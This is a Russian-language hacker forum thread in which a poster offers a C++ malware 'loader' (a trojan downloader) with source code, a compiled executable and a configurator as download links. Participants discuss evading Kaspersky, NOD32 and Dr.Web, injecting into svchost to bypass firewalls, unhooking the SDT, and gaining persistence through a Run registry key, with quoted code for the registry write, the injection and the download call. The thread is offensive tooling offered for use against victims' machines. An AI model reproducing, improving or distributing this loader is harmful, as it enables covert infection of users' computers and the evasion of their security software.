Решил написать лоадер. Просто выдрал из bloodknife`а всё ненужное. :D
Так значит:
1)Вес не пакованый 4кб.
2)Каспер, нод, др.веб в ауте.
3)Инжект в svchost - фаеры молчат.

На С++. Правите конфиг и юзаете. Естесн с исходниками.

Внимание! Адептами програминга перед просмотром сороцев положить валидол под язык! ;)

http://lordofring.tushino.com/LOADER.rar
http://rapidshare.com/files/39634411/LOADER.rar.html
http://softz.ifolder.ru/2507458

Ухх открываем сорсы и начинаем готовить мат :)

*Сердечный приступ*

Ну фто ж, начнём =)
Метод инжекта не очень оригинальный. Но а вдруг выбранная тобой база уже занята? Тогда ведь песец ослику (С) =( Так что было бы неплохо добавить релоки и их обработку на всякий пожарный.
Насчет добавления в автозапуск - ну эээ я например комп неделями не перезагружаю.. имхо все же лучше запускать троя сразу. Хотя это на вкус и цвет.. но тогда придется подождать завершения скачивания через WaitForSingleObject на объекте созданного в другом процессе потока

Далее, а ты уверен, что URLMON.DLL окажется в адресном пространстве жертвы? Я - нет. Поэтому было бы неплохо вначало func() дописать LoadLibrary("urlmon.dll"); а то есть риск вылететь с Access Violation ;)

Ну а вообще кода там не очень много, про сотню строчек больше сказать, вообщем-то и нечего :)
Разве что стиль отвратительный =) Ну ладно )

инжекст в свхост? и какие фаеры молчат, "огласите весь список пожалуйста" (с)
называть вещи надо своимим именами, молчать будет, по-моему, тока
виндовый фаер))) и пара таких же "псевдо" фаеров...

у мну НОД реагирует:) мож че то не так делаю... и согласен, что в хвост вставлять не стоит фаер по коннекту среагирует...
HKEY hKey;
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\poli cies\\Explorer\\Run",
NULL,
"",
REG_OPTION_NON_VOLATILE,
KEY_SET_VALUE,
NULL,
&hKey,
NULL); //запуск процесса нас сильно запалит, поэтому просто запишем файлик в автозапуск.

угу а изменение реестра нод не палит да?...

Гы-гы svchost меняет реестр! Ужс! :D :D :D

Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.

Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.
Смотря какой код возьмешь) Самый лучший вариант через нтсистемдебагконтрол, если достанешь, конечно)

Вот, критику учёл. Вес 11кб(непакованый), чистка sdt , др.веб уже в теме...
Заливать на разные файловики не стал - вес всего 7кб.

http://lordofring.tushino.com/LOADERv.1.1.rar

Откуда взял такой кривой код восстановления Sdt ?)

rootkit.com

а можно откомпиленный вариант для тестов? =)

lordofring.tushino.com/_LOADER.exe

мдаааааааааааа ...первый вопрос - под чем ты это писал?

я вот просто не понимаю, ну на*** такие потики создавать? типа вот я написал лоадер. традиционный (91ого года) метод инжекта. Традиционная скачка файлов. Вот и весь лоадер. Поставьте мне плюсики, я крутой кодер. Ну я сам тоже могу написать тебе ДДОС бота какого-нибудь очередного, со стандартным набором ф-ий. Это не кодинг а рисование - переклеивание чужих кусков кода в свои файлы.
А что код у тебя вообще в .h это пиздец конечно.

А что код у тебя вообще в .h это пиздец конечно.

Что ты имеешь в виду?


Поставьте мне плюсики, я крутой кодер.

+ я не просил;)
На ачате я не видел исходников работающего лоадера. А если и выкладывают какой-нить лоадер(без исходников), то это полное г. на которое фаеры и антивири кричат как коты на валерьянку. А тут те работающий пример + исходники.
Согласен, что инжект палёвый, но я ведь добавил восстановление sdt.

А тут те работающий пример + исходники.
ну и какой код из своего лоадера ты сам писал?

.h - header file (заголовочный файл)
Код правильнее хранить в .cpp-файлах.

Народ! Могу сказать только одно: критикуя - предлагай!!! Вон берите пример с греата, он небось немало подсказок дал.

понимаешь ли в чем дело.
Во-первых, у тебя как бы антивирусы молчат, но это если скачивать нормальный файл.
Потому траффик, который ты получишь через
URLDownloadToFile(NULL,FROM,TO,0,NULL);
палится IMONом нод.

Во-вторых, твой уникальнейший ключ реестра Current Version\Run, как и все подобные RunOnce и т.п. палятся anti-spyware аутпоста, глазами юзера да и кто знает чем ещё.

В третьих, неясно что значит строка

if(!Inject(OpenProcess(PROCESS_ALL_ACCESS,false,Ge tProcessID("svchost.exe")),&func)) ;

и зачем там нужен if, если потом стоит ;

В четвертых, ZoneAlarm не даст тебе снять хуки sdt. Не даст загрузить драйвер или открыть секцию PHYSICAL MEMORY.

if(_NtOpenSection(&hPhyMem, SECTION_MAP_READ | SECTION_MAP_WRITE, &oAttr ) != STATUS_SUCCESS)

причем, как я понял, это у тебя просто выдрано откуда-то с 99 года сорца, и засунуто в .h файл.

В пятых, не понятно зачем тебе строки

LoadLibrary("KERNEL32_DLL"); //грузим либы
LoadLibrary("USER32_DLL");


да и вообще все остальные.

В шестых, нет никакого смысла в том что ты выложил. Лоадер он на то и лоадер. Что должен не палится. Должен непалевно скачивать файлы. Должен весить очень мало.
Должен не использовать всякие чужие нестабильные ring0-переходы через колгейт. И не должен, наконец, быть собраным из чужих кусков сорцом.
А вообще никаких претензий быть не может, просто тебе было скучно и нечего делать. Я это так понял.
Причем, ладно бы если ты это написал на осенблере.
Типа понтанулся бы)
Как снег когда то понтанулся, выложив bindshell-исходник)
А на c++ уже все остальные нубы умеют((
Этим народ не удивишь.

Alexsize, я не критикую, просто я не могу понять что именно в этом лоадере было написано им, по мне так это обычный копипаст с других исходников с небольшими авторскими поправками

Alexsize, я не критикую, просто я не могу понять что именно в этом лоадере было написано им, по мне так это обычный копипаст с других исходников с небольшими авторскими поправками
Ты в теме? Ну так выложи свой лоадер! Что ж тогда критиковать вообще? Вот я считаю себя в праве что либо критиковать только если я в этом разбираюсь.

To KEZ


Нужно называть вещи своими именами

Всю эту работу выполняет svchost. Что будет кричать нод?:))))

Ты в теме? Ну так выложи свой лоадер! Что ж тогда критиковать вообще? Вот я считаю себя в праве что либо критиковать только если я в этом разбираюсь.
Ну а смысл? В паблике сейчас 2 наиболее распространенных метода обхода файрволла, это инжект с предварительным снятием хуков и обход через BITS сервис, в сети куча исходников лоадеров, юзающих эти методы. Я не запрещаю автору использовать эти технологии в своих работах, но если уж он выложил "очередной" лоадер с инжектом пусть готовится к критике.

Сделать билдер оказалось проще, чем я думал.:)))

+Добавлен билдер.
На размер билдера не смотрите - borland C++


http://rapidshare.com/files/41584071/configur_loader.rar.html

To KEZ


Всю эту работу выполняет svchost. Что будет кричать нод?:))))
Да хоть папа римский. Создание ключа в ветке Run заемтно 100%.

В пятых, не понятно зачем тебе строки
Это на случай, если либ в адресном пространстве не окажется

Сделать билдер оказалось проще, чем я думал.))
у тебя не билдер, а конфигуратор, не путай ;)

ммм... тру .. конфигуратор..
Кста есть у кого экзамплы билдера на c++

кста.. а можн ли было б засунуть .dat
в рессурсы .. и там его конфигурировть?

p.s а даж если не получиться сконфигурировать с рессурсов..
то можно было б всунуть в temp и от туда конф-ть

Вот сорцы конфигуратора.
http://rapidshare.com/files/41505646/builder_sources_.rar.html

Кста есть у кого экзамплы билдера на c++
Берем exe и в оверлеи пишем конфиг.

Берем exe и в оверлеи пишем конфиг.
Я спросил экзампл... а не рассказать как это сделать

А что тут такогО? CreateFile / CreateFileMapping / MapViewOfFile / пишем / UnmapViewOfFile / CloseHandle x2

Я спросил экзампл... а не рассказать как это сделать
Если ты привык получать все в готовом варианте, то уж извини, наврятли кто выложит тебе исходники нормального билдера.

Если ты привык получать все в готовом варианте, то уж извини, наврятли кто выложит тебе исходники нормального билдера.
Я не просил выкладывать ОХЕРЕННЫЙ билдер...
а просил показать небольшой пример...

P.S Great ... ок получилось..

А что тут такогО? CreateFile / CreateFileMapping / MapViewOfFile / пишем / UnmapViewOfFile / CloseHandle x2

Нах CreateFileMapping / MapViewOfFile ? Открываем файл, читаем содержимое в буфер, заменяем в буфере то, что нам надо, пишем в новый файл.

Ну пусть делает как ему больше нравится. Мне больше нравится мапировать, т.к. это более аккуратно, прозрачно и винда меньше обращает внимания.